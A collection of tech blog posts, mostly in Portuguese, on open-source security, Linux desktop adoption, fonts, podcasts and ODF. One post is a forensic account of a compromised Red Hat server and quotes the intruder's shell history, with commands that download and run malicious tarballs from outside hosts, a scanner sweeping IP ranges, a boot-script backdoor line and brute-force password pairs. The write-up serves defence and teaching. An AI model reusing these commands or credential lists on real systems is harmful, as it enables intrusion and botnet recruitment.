E no grupo 2 ficam todos os outros projetos Open Source, disputando um lugar ao sol e na passarela das distribuições Linux. Aqui estão as dezenas de milhares de projetos abandonados do SourceForge.net, e também projetos longe da criticidade das do grupo 1, mas já um pouco mais usados, como Gnome, KDE, X.org, a outra parte do Kernel, OpenLDAP, NAS, VNC, ImageMagick, Bash, Gimp, Kopete, Gaim, libc++, libxml, ntp, e mais todo o resto que não aparece no grupo 1 mas que está instalado aí no seu computador.

Enquanto pensamos que no closed source podem haver pontos inacessivelmente inseguros e backdoors, devemos também nos perguntar se há realmente pessoas analisando todo Open Source que interessa, com enfoque em segurança. Pense no grupo 2.

Sobre segurança em Open Source, a única coisa que podemos afirmar é que o código se mantém aberto para quem quiser auditá-lo (característica que o closed source não tem e nem quer ter). Mas novamente, isso não é garantia de que suas falhas serão achadas.

No grupo 1, dos superpopulares, a estória é outra. Eles são naturalmente submetidos a stress massivo e constante do mundo real. E a dependência que muitas empresas e indivíduos tem desse grupo os leva a se relacionar de forma simbiótica com sua evolução. Usam o fato de ter o fonte disponível para auditar e contribuir melhorias.

A separação entre os grupos não é tão nítida. Usei só para ilustrar. A fronteira é na verdade uma larga faixa de projetos Open Source com diferentes graduações de popularidade, stress e uso.

É preciso ter a soma de dois aspectos para se ter a melhor segurança: código fonte aberto + extrema popularidade, sendo o último mais importante (e mais difícil de alcançar) que o primeiro.

Um closed source também tem sua chance de ser seguro. Basta a empresa que o fabrica cuidar bem de seu produto. Se ele for popular, ela tende a cobrar menos para executar este trabalho. Se for menos popular, mas ainda desejado pelos clientes, seu preço tende a ser mais alto.

O nabo é dos NETs

Complementando a estória do Antônio “LedStyle” Cláudio, eu tenho NET de 200kbps em Higienópolis. É tão bom quanto 200kpbs conseguem ser.

Mas quero aumentar a velocidade, e depoimentos como o dele dão medo. O pior de tudo é o atendimento péssimo das centrais dessas prestadoras. E o serviço é bem caro, mas vamos dizer que atribuo isso ao fato de que custo de banda core no Brasil é caríssimo.

Diga-se de passagem, meu pai colocou 2mbps em casa, com NET Fone. Ele fez uma análise meticulosa das tarifas de ligação telefônica comparando outras operadoras, e disse que o preço do minuto NET é bem mais caro. A NET diz que é mais barato. Bem, isso é uma meia verdade, somente em alguns horários, para ligações locais muito curtas. Como diz o ditado, uma meia verdade é uma mentira.

Antes eu tinha o Giro, da Vesper/Embratel. 300kbps de baixa qualidade que vinham através de um modem sem fio que usava a infraestrutura CDMA da Vesper, e era conectado por USB no computador, e tinha suporte ruim para Linux.

Por ironia do destino, o atendimento telefônico do Giro da Vesper era ótimo. Atendentes sinceros, com bom conhecimento técnico e que retornavam ligações depois de fazer análises bem feitas. Fiz questão de registrar isso quando infelizmente cancelei o serviço porque sua tecnologia não me atendia.

OSDL Linux Client Survey Analysis is Out

On January 25th the OSDL released their 2006 Linux client survey analysis, which identified the following barriers for Linux deployment on desktops:

  1. Application availability
  2. Quality of peripheral support
  3. End user training
  4. Desktop management issue

It is not that applications don’t exist for the Linux desktop, but users grow accustomed to certain applications that they just can’t live without.

Users report they are missing applications as Microsoft Office (OpenOffice.org is the alternative), Adobe Photoshop (which has The Gimp as the closest, but still far alternative), AutoCAD (with QCad as a very far similar) and others.

For peripherals, this is the list:

  1. Printers
  2. Personal storage devices (i.e. USB memory)
  3. Scanners
  4. Digital cameras
  5. Mail and messaging devices
  6. Web cam / video
  7. Smartphones

However, it is still difficult to buy a printer at your local electronics store and expect it to work out of the box on a Linux machine. While most printers are supported on Linux, there is still a lag from the time when a printer hits the market to when the driver driver is available and automatically installed on your computer by a commercial distro update.

And as a Linux user, I must add that when the device works, it usually won’t work with its full set of capabilities, because drivers are usually written by third parties on the OSS world – and not by their manufacturers, which are expected to have a much deeper knowledge (and project commitment) on these hardware capabilities.

So the problem is a committed application and drivers development. Well, how can companies commit themselves to develop desktop software (which means friendly to non-technicall users) in a world that had not decided yet about some elementary standards? Yes, there is the FreeDesktop.org initiative but the standards they are focused on are more related to KDE-Gnome interoperability.

Most important standards that must be defined will find their home in a layer bellow: LSB. But unfortunately, the Linux Standard Base still has a big job to finish and still seems to have difficulties to catch up with ISVs.

As an example, there is no de facto standard defined for things as trivial as a configuration files format for the whole system, not only for desktop apps. This is particularly important because configurations are what makes software run in a specific way. They are the soul of any software (while code is the body). A popular standard for configurations will provide ways for any software to collaborate with, and auto-configure any other software. On Windows, this was successfully achieved with its registry. On Linux, similar but broader and better alternatives exist (as the Elektra Initiative), but this is a subject that seems to not inspire the OSS community.

Standards bodies can’t do everything alone. The community must be ready for changes, adaptations, and have courage to throw away code that was not choosed by the standard, and start focusing on what was selected to be part of it. Courage to stop reinventing the wheel. For example, on a vanilla KDE installation you will find about 4 different media players (Amarok, Juk, kboodle, noatun, etc) and 3 different plain editors (kate, kedit, kwriter). If you have Gnome installed on same system, add a few more to each class of applications (and to the icons that will appear on your menus). This is confusing, fat and bad.

Another important fact on the analysis is a 49% desktop share for Canonical’s Ubuntu Linux, against RHEL and SLED with 16% each. RHEL and SuSE are more popular on servers and are essentially and structurally different distributions, but both use RPM as their packaging system. While Ubuntu is radically different from both, based on Debian, with the DEB format for packages. A well known and well used packaging system is very important on a desktop world, because this is what guarantees an easy, painless software installations and upgrades. So if I am an ISV with limited technicall staff and time resources, how should I package my software for easy deployment? DEB or RPM? If RPM, should I focus on Red Hat or SuSE flavors? Though questions.

Application vendors cannot afford to develop, distribute, and support applications across a fragmented Linux market.

Red Hat and Novell should look at their future server market, paying attention on what is happening today on the desktop. History shows that people tend to bring to work (and to servers) what they like and use on their desktops at home. This is Ubuntu’s long term strategy and they seem to be succeeding, at least on their first phase.

Na Trilha do Invasor

Qualquer administrador de firewall pode observar em seus registros que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo uma varredura, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos servidores web, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.

Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.

Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.

Os Rastros Deixados pelo Cracker

O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:

Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:36:27 sshd[PID]: refused connect from  IP.IP.IP.IP
Feb 22 12:26:27 sshd[PID]: refused connect from  IP.IP.IP.IP

Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.

Histórico do Ataque

Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Primeiramente, era necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.

A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.

Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo /etc/inittab. Vimos que um dos primeiros scripts que são executados no sistema é o /etc/init.d/functions e fizemos os seguintes testes:

bash$ rpm -qf /etc/init.d/functions
initscripts-7.93.20.EL
bash$ rpm -V initscripts
S.5....T c /etc/rc.d/init.d/functions

Verificamos que este arquivo faz parte (rpm -qf) do pacote initscripts, e em seguida testamos sua integridade (rpm -V). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.

Mas o que foi alterado no script functions ?

A última linha do script era esta:

/usr/bin/crontabs -t1 -X53 -p

Suspeitamos imediatamente porque o comando crontab não se chama “crontabs”. Confirmamos novamente com o RPM:

bash$ rpm -qf /usr/bin/crontabs
o ficheiro /usr/bin/crontabs não pertence a nenhum pacote

Pronto. Estava constatado que esse tal comando crontabs era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:

bash$ strings /usr/bin/crontabs
[...]
"smbd -D"
"(swapd)" &
[...]

Ou seja, era este tal crontabs que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos ps e top para verificar se um processo chamado smbd estava rodando porque usamos os mesmos rpm -qf e rpm -V para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico ksysguard (que não foi modificado) do KDE e pudemos observar um tal processo smbd -D rodando. Chamou a atenção que o ksysguard mostrava todos os processos executando sem seus parâmetros, e somente o smbd apresentava um parâmetro. Não tardou a acharmos um arquivo chamado “/usr/bin/smbd -D” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:

bash$ strings “/usr/bin/smbd -D"
[...]
Received SIGHUP; restarting.
Generating new %d bit RSA key.
RSA key generation complete.
   -b bits    Size of server RSA key (default: 768 bits)
By-ICE_4_All ( Hackers Not Allowed! )
SSH-%d.%d-%.50s
This server does not support your new ssh version.
Sent %d bit public key and %d bit host key.
sshd version %.100s [%.100s]
[...]

Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa smbd -D era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em /var/log/messages encontramos a evidência final:

Feb  19 19:24:49 localhost smbd -D: RSA1 key generation succeeded
Feb  19 19:24:50 localhost smbd -D: RSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D: DSA key generation succeeded
Feb  19 19:24:51 localhost smbd -D:  succeeded

Essas são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH, porém com um nome mascarado para seu arquivo e processo (smbd). A partir desses registros pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.

Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo /root/.bash_history, e vimos isto:

bash# less /root/.bash_history
[...]
cd /usr/share/.a
wget lamisto.octopis.com/mig.tgz
tar xzvf mig.tgz
./mig g-u root -n 0
./mig -u root -n 0
cd /usr/share/.a
wget utilservices.iasi.rdsnet.ro/~marianu/flo.tgz
tar xzvf flo.tgz...linhas omitidas...
cd /var/tmp
wget djanda.com/get/usr.tar.gz
wget djanda.com/get/x.tar.gz
tar xfvz usr.tar.gz
cd usr
chmod +rwxrwxrwx *
./crond
cd ..
tar xfvz x.tar.gz
cd x
chmod +rwxrwxrwx *
mv unix x
./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201. 26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x 201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39; ./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201. 46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50
[...]
/usr/sbin/adduser scanning

O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado scanning, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:

  • No diretório /usr/share/.a ele instalou e executou o tal comando mig que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando strings para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando last (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.
  • Em /var/tmp foi baixado um tal usr.tar.gz, que aparentemente é um bot de IRC. Mais tarde, com os mesmos comandos do RPM, descobrimos que o comando /bin/netstat também foi alterado, provavelmente para esconder as conexões deste bot a diversos servidores de IRC na porta padrão 6667, o que constatamos com o ksysguard. Adiante explicaremos o que um cracker faz com isso.

Mas o mais interessante foi o x.tar.gz baixado. Continha dois executáveis chamados find e take, o script chamado simplesmente de x, e um arquivo muito especial de nome code.conf. Lendo o simplíssimo script x, vendo no histórico como ele era executado muitas vezes, e usando a intuição, ficou claro que o comando find varria faixas IP inteiras em busca de portas 22 (SSH) abertas. Os hosts encontrados eram então passados para o comando take, que se encarregava de usar as 18459 combinações de usuário e senha disponíveis no arquivo code.conf para tentar se logar nas máquinas encontradas. Um login bem sucedido tinha o IP, usuário e senha registrados num arquivo que indicaria ao cracker as próximas máquinas a invadir. E sim, este arquivo já tinha uma lista de hosts e respectivas senhas em que essas ferramentas conseguiram penetrar.

Foi exatamente esse procedimento de login por força bruta que foi detectado pelo IDS da empresa B, quando o servidor deles tentou ser invadido sem sucesso.

Quando chegamos a isso, ainda não estava claro como a máquina de A foi invadida. Estava checando se e como os administradores da máquina seguiram meus conselhos informais de segurança, verificando as regras de iptables, serviços ativos, etc. Parecia tudo correto, ou não alarmantemente errado. Foi quando demos uma olhada com mais atenção no conteúdo do code.conf e entre suas mais de 18 mil linhas encontramos estas:

root passw0rd
root pa55word
root pa55w0rd
sapdb sapdb
apache apache
apache 123456
apache2 apache
apache2 apache2
apache2 apache123

Enquanto varríamos o arquivo com os olhos, de repente o administrador da máquina colocou a mão na testa, e com voz de lamento nos contou que a senha de root era a manjadíssima passw0rd (com um algarismo zero no lugar da letra ‘o’)! O serviço SSH estava aberto e permitia login do root pela rede. Aquela máquina também tinha sido vítima do scan do cracker, e foi assim que ele entrou e ganhou poder total.

Eu conhecia várias máquinas formais e informais que implementaram aquele mesmo esquema de segurança que foi sugerido, estavam anos conectadas à Internet, e nunca sofreram ataques. Mas uma simples senha conhecida, bem típica de ambientes de testes onde várias pessoas compartilham acessos similares e informais às máquinas, foi o calcanhar de Aquiles da pilha de segurança. Isso confirma que ataques bem sucedidos são sempre responsabilidade do administrador, e nunca do software de segurança em especial.

A Reinstalação da Máquina

Depois de um ataque como esse, e depois do relatório conclusivo, a melhor coisa é limpar completamente o disco e partir para uma reinstalação completa. Desta vez acompanhei de perto a instalação, e seguimos algumas regras simples de segurança:

  • Só instalamos pacotes que sabíamos que seriam usados. Descartamos completamente a idéia de fazer uma instalação completa.
  • Depois de instalado, desligamos alguns serviços que sabíamos que não seriam usados, como NIS, Samba, Portmap, NFS. E se possível os desinstalávamos.
  • Criamos regras para o iptables fechando praticamente tudo menos as portas 80 (HTTP) e 443 (HTTPS).
  • Requisitamos ao provedor do link P que configurasse regras semelhante em seu roteador, formando um firewall duplo.
  • Por via das dúvidas, desabilitamos o acesso por SSH ao root, obrigando o administrador a se logar com um usuário qualquer e depois ganhar privilégios com o comando su. Isso funciona como uma restrição dupla para administrar a máquina.
  • E dessa vez foram usadas senhas decentes, bem difíceis, com letras, números, e que não eram derivadas de palavras óbvias.
  • As senhas só foram informadas verbalmente para poucas pessoas. Evitamos passar por e-mail.

Por que o Cracker Ataca ?

Uma coisa que vale explicar é o bot de IRC. Ele serve para fazer ataques de DDoS (Distributed Denial of Service). Um bot fica constantemente conectado a uma sala de IRC pré-definida. Depois de invadir várias máquinas e ativar os respectivos bots, o cracker entra nessa sala de IRC e tem ao seu dispor um exército de bots distribuídos programados para executar ações ao seu comando. O DDoS acontece quando o cracker, via comandos aos bots na sala de IRC, faz os computadores invadidos enviarem simultaneamente grandes pacotes de dados para algum site-vítima, escolhido pelo cracker. Naquele momento, o link do site-vítima fica sobrecarregado, e a sensação é que ele está fora do ar. Isso pode durar o tempo que o cracker desejar.
Ataque Distributed Denial of Service

Esse processo foi ricamente detalhado pelo dono de um desses site-vítima, em grc.com/dos/grcdos.htm, e é leitura obrigatória a qualquer um que se interessa por segurança.

Em todas as análises que fizemos, não encontramos nada de útil no ataque do cracker. A máquina estava conectada a outras redes, mas não pareciam interessá-lo. A única conclusão que pudemos chegar é que o cracker ataca por atacar, e depois usa seu ataque para atacar mais. Só. Simplesmente isso. Sim, porque as ferramentas, técnicas e rastros deixados mostram que ele provavelmente usou ferramentas criadas por outros, talvez seguindo uma documentação que mostra os comandos prontos, passo a passo. Sem saber direito o que estava fazendo. Sem objetivos “mitnickianos”, nem financeiros, nem algo que o exaltasse perante outros crackers.

Só Freud explica…

Freetype with Bytecode Interpreter

I am the maintainer and writer of most of the official Linux Font-HOWTO [official home], and one of its main points is to explain what is the TrueType Bytecode Interpreter.

I spent some time this morning updating the freetype package on my system [get RPMs], compiling it with support to BCI, and I took the chance to get some “before & after” screenshots of Konqueror browser accessing Google Mail with and without BCI.

Check it out. This is better than makeup ads:

Before: Original Freetype lib without BCI After: New Freetype RPM compiled with BCI
freetype4-nbci.png freetype4-bci.png
freetype1-nbci.png freetype1-bciaa.png freetype1-bci.png
freetype2-nbci.png freetype2-bciaa.png freetype2-bci.png
freetype3-nbci.png freetype3-bciaa.png freetype3-bci.png

After switching to BCI-enabled freetype, the use of Webcore fonts without anti-aliasing gives much much much better results, as you can see. Unfortunately these fonts are not free, but they are better than the popular Bitstream Vera fonts because they include hinting information.

BTW, anti-aliasing is useful in 2 situations only: if you are rendering fonts in big sizes (bigger than 13px), or if you have bad, non-hinted fonts (as Bitstream Vera) with a bad font rendering library (as Freetype without BCI support). If you have good hinted fonts and a good rendering library (as Freetype with BCI), restrict anti-alising only for big font sizes.

My Podcasts

A podcast is a blog that, in addition to text, also publishes media files. So you need a special “reader” to listen them, so people use softwares like iTunes, Amarok, iPodder to subscribe and automatically get the media.

I’m officially releasing my podcasts here, posting songs in high quality MP3 format. These are the channels, subscribe using the orange buttons below:

Enjoy.

Sobre Podcast

Uma vez perguntei a um amigo o que é um podcast, e ele disse que é um MP3. Bem, isso é tão minimalista quanto dizer que um Gaudí é um amontoado de tijolos, ou que a Internet é uma porção de bits dançantes.

Um podcast é um blog não-textual. Seu conteúdo pode ser audio e/ou vídeo, rodeado por metainformações do tipo “autor”, “entrevistado”, “banda”, “estilo”, “sumário” etc.

Como todo blog, ele tem regularidade: “episódios” no lugar de posts e assim por diante.

Você “assina” um podcast como assina uma revista, da mesma forma como assina um blog (via RSS ou ATOM). Mas como um browser é um leitor essencialmente textual, é mais comum e prático assinar podcasts usando softwares de mídia: iTunes, Yahoo! Music Engine, Amarok, etc.

Na convergência das coisas, um podcast pode ser comparado a um programa de rádio onde o próprio ouvinte decide quando e como vai ouvi-lo.

Num mundo onde tivermos banda larga no ar tão abundante e livre quanto ondas de rádio, além da memória para freqüências de estações, os rádios de nossos carros terão também a assinatura de nossos podcasts preferidos. Com ainda não chegamos a isso, temos que usar MP3 players modernos como o iPod – que tratam podcasts de forma especial – para termos essa funcionalidade.

E nesse mundo, os podcasters seremos você e eu, pessoas comuns falando diretamente para o mundo. Publicar um podcast é tão simples quanto publicar posts num blog. É inclusive algo que se pode integrar com plataformas de blogs comuns, com plugins para WordPress, etc.

Se você tem um fluxo de coisas para dizer, crie um podcast. Se você tem um fluxo de coisas para serem assistidas, crie um podcast. Se você tem um fluxo de coisas que quer que as pessoas ouçam, crie um podcast. Este último é o meu caso, sobre Jazz Brasileiro, e por isso estou juntando os pedaços e os módulos para criar um.

Andei estudando isso ultimamente, e achei importante compartilhar…

HD de 1 Terabyte, para quem ?

Vão anunciar o HD de 1 Terabyte.

Tempos atrás, fiz um estudo sobre clusters de alta disponibilidade e a certa altura levantei o sizing real de storage de aplicações de servidor. O resultado está aqui:

Sizing

Adicionando a essa lista, lembro quando a DBA de um grande e famoso supermercado online me chamou para mostrar que a RAM do servidor do DB (1.5GB) era maior que o próprio DB (1GB), que incluia lista de todos os produtos, todos os clientes, todos os carrinhos que já passaram por lá, e tabelas de controle.

Instalações oversized é algo muito comum hoje em dia porque arquitetos costumam usar sua sensibilidade de uso de desktop ao definir RAM, storage, CPU etc de um servidor.

Bem, saibam que desktop é uma das coisas que mais exige RAM, disco (em velocidade e tamanho) e CPU, porque é onde o usuário é mais sensível a atrasos no tempo de resposta (a famosa ampulheta), e tem sempre muita multimídia para aramazenar e tocar.

Aplicações de server são em geral muito mais leves, salvo algumas poucas exceções.

Um HD de 1 terabyte, hoje, faz muito mais sentido para uso pessoal do que em server. Mas é a tendência natural das coisas, e não vamos puxar o freio de mão para esse crescimento (e barateamento), não é mesmo !?

Open Source na Prática

O primeiro a propor a idéia de Open Source Software (OSS) foi Richard Stallman na década de 1970, que a formalizou, com a ajuda de alguns advogados, na famosa licença GPL.

Ninguém se interessou ou sequer ouviu falar sobre isso, até que em meados da década de 1990, tudo mudou com a vertiginosa popularização do Linux, sistema operacional OSS.

O termo popular “Software Livre” não é a melhor tradução de Open Source Software, cujo correto é Software de Código Fonte Aberto. É importante notar isso porque muitas vezes o termo é erradamente associado a idéia de não-proprietário, ou não-comercial. A verdade é que um software pode ter seu código fonte aberto mas ser comercial e/ou proprietário e vice-versa, portanto são conceitos que não devem ser confundidos.

A idéia é simples: eu escrevo um programa e você pode copiá-lo à vontade sem nem sequer me notificar. Pode inclusive modificá-lo e redistribuí-lo, contanto que também mantenha suas modificações abertas e informe qual a origem e os autores anteriores do software.

Isso não quer dizer que teremos diversas versões desconexas do mesmo software, num dado momento. Cada modificação passa por um processo muito bem organizado de aceitação ou rejeite, onde boas melhorias retornam à base e são incorporadas à nova versão do software. Na verdade, hoje, a maioria dessas contribuições não é mais feita por indivíduos, mas por empresas de tecnologia.

É comum — e errado — pensar que OSS significa a morte de todo software de código fechado. Isso não acontece porque a tendência é que as grandes inovações continuem a ser exploradas pelo modelo fechado. Imagine um mundo hipotético que ainda não conhece editores de planilhas. É natural que, ao lançar esse produto, seu inventor opte pelo modelo de código fonte fechado, para maximizar seus lucros através do total controle de sua invenção. Contudo, conforme essa invenção se populariza, desenvolve um mercado e adquire concorrentes, OSS surge como uma das formas — a mais inovadora — para repensá-la. OSS inova ao reimplementar o que outros inventaram e exploraram anteriormente. Recentemente, porém, a indústria começou a usar OSS diretamente para lançar certas inovações, justamente pelo seu poder de agregar comunidades e criar ecossistemas.

Também é comum — e errado — acreditar que se o software em si é gratuito, elimina-se por completo os gastos. Mas sempre haverá a necessidade de um suporte confiável. OSS altera o eixo do valor agregado do software, movendo-o do software em si (que não custa nada), para o serviço de suporte.

Open Source, Open Standards relacionados a TI

Em seu processo de amadurecimento, a única diferença prática entre um software OSS e outro de código fonte fechado é a ordem em que as coisas acontecem. Um fabricante comercial terá que criar estrutura e suporte regional antes de vender o produto. Já no OSS, ofertas de suporte só surgem (espontaneamente) depois que ele goza de uma boa gama de usuários. Mas seja qual for a ordem, a única coisa que garante maturidade a qualquer software ou produto é um ciclo de desenvolvimento–uso–suporte, que estimula mais desenvolvimento. Somente essa maturidade garante a aceitação do produto em empresas responsáveis. E hoje, OSSs como Linux, Apache, OpenOffice.org, Samba, e outros já gozam desse ecossistema cíclico de uma forma vasta, global e vigorosa.

Hoje, OSS tem aplicações mais maduras em infraestrutura e alguns nichos de middleware. Por sua vez, os softwares de código fonte fechado apresentam maior desenvoltura mercadológica nas funcionalidades de maior valor agregado ao negócio (ERPs, CRMs ou processos empresariais). Isso porque estas funcionalidades têm uma amplitude menor de usuários, o que inviabiliza o surgimento de suporte espontâneo — fator vital para a maturidade do OSS.

A indústria tem buscado um balanço saudável para misturar componentes fechados com OSS, a fim de maximizar o seu benefício sem abrir mão da maturidade de ponta a ponta. Prova disso é que tem sido cada vez mais comum a implantação de ERPs maduros — geralmente de código fechado — sobre plataformas abertas maduras — como distribuições Linux com suporte.

A receita para o melhor balanço é insistir no uso de Padrões Abertos. Por garantirem uma interoperabilidade fácil entre camadas abertas e de código fechado, o uso de padrões amplia as escolhas e a liberdade da empresa que compra TI para compor a melhor mistura do momento, com opções OSS e/ou de código fechado.

IBM e OpenDocument Format

A IBM apóia o uso de OpenDocument Format – o padrão aberto para documentos de escritório, e o formato usado pela suite OpenOffice.org, KOffice, Corel WordPerfect Office, e outros.

Estamos num processo interno gradativo de migração para ODF, e falamos da importância disso com governos e clientes, globalmente. Nossos produtos suportam ODF no sentido de consumir e gerar documentos nesse formato.

Uma das vozes mais conhecidas é o blog do Bob Sutor, executivo de padrões da IBM que dá muito foco para ODF. Aqui no Brasil temos o Cezar Taurion, eu e outros fazendo esse papel.

E finalmente vimos o Brasil tomando a liderança na América Latina, recomendando o uso de ODF como formato preferido para documentos do governo.

Semana passada divulgamos o seguinte press release:

Brasil incentiva a utilização do formato OpenDocument

Aliança ODF também é reconhecida por países da Europa e Ásia

São Paulo, 13 de dezembro de 2006 — A OpenDocument Format Alliance (Aliança ODF), que reúne grande número de organizações, instituições acadêmicas e representantes da indústria com o objetivo de melhorar o acesso aos documentos eletrônicos de governo, elogiou a decisão do Brasil de recomendar a ODF como o formato preferido do governo. A Aliança também parabenizou a decisão da Índia de usar a ODF em um grande órgão do governo estadual e a decisão unânime da Itália de reconhecer a ODF como padrão nacional.

A Aliança ODF expressou, ainda, seu apoio à predisposição da China, Coréia e Japão de requerer um “formato de documento internacional e baseado em padrões abertos”, além de reuniões de planejamento de TI e fonte aberta celebradas em forma conjunta anualmente pelos governos dos três países. A Polônia também foi elogiada por demonstrar sério interesse na adoção da ODF após uma reunião nacional celebrada para seu governo com grande número de participantes da indústria e organizações sem fins lucrativos.

Com a publicação da versão 2.0 do e-Ping Interoperability Framework, o Brasil se transforma no primeiro país da América do Sul que recomenda oficialmente a ODF. O quadro estabelece que todos os arquivos .xls, .doc e .ppt se encontram em transição, ou seja, que já não cumprem com suas políticas técnicas, e que a ODF é agora o formato recomendado oficialmente pelo governo do Brasil. O Instituto Nacional de Tecnologia e Informática, o Ministério da Defesa e o Governo do Estado do Paraná, no Brasil, são membros da Aliança ODF.

“2006 acaba de maneira tão auspiciosa como começou, com legiões de governos no mundo inteiro expressando verdadeiro apoio à ODF”, disse Marino Marcich, Diretor Executivo da Aliança ODF. “Parabenizamos o Brasil, a Índia, a Itália, o Japão, a Coréia, a China e a Polônia por reconhecerem a ODF, cada país a seu modo, e estamos ansiosos por ver o impulso contínuo deste movimento no ano que vem.”

Na Índia, o governo ordenou usar arquivos ODF para o escritório de impostos comerciais do governo estadual de Delhi. Além disso, a Itália se une a países como a Malásia, que têm a intenção de reconhecer a ODF como padrão nacional (consultar www.uninfo.polito.it), enquanto o Japão, a Coréia do Sul e a China pensam em usar exclusivamente formatos de documentos internacionais e baseados em padrões abertos como a ODF para reuniões celebradas por seus diretores gerais de Tecnologia e Informática, a fim de debater e promover o software de fonte aberta.

A Aliança tem crescido a mais de 400 membros em mais de 40 países, mostrando um impulso sustentado para o formato de arquivo aberto em nível mundial.

Para obter informações adicionais sobre a ODF Alliance vá para www.odfalliance.org.

Sobre a IBM
Para mais informações sobre a IBM, visite www.ibm.com/br.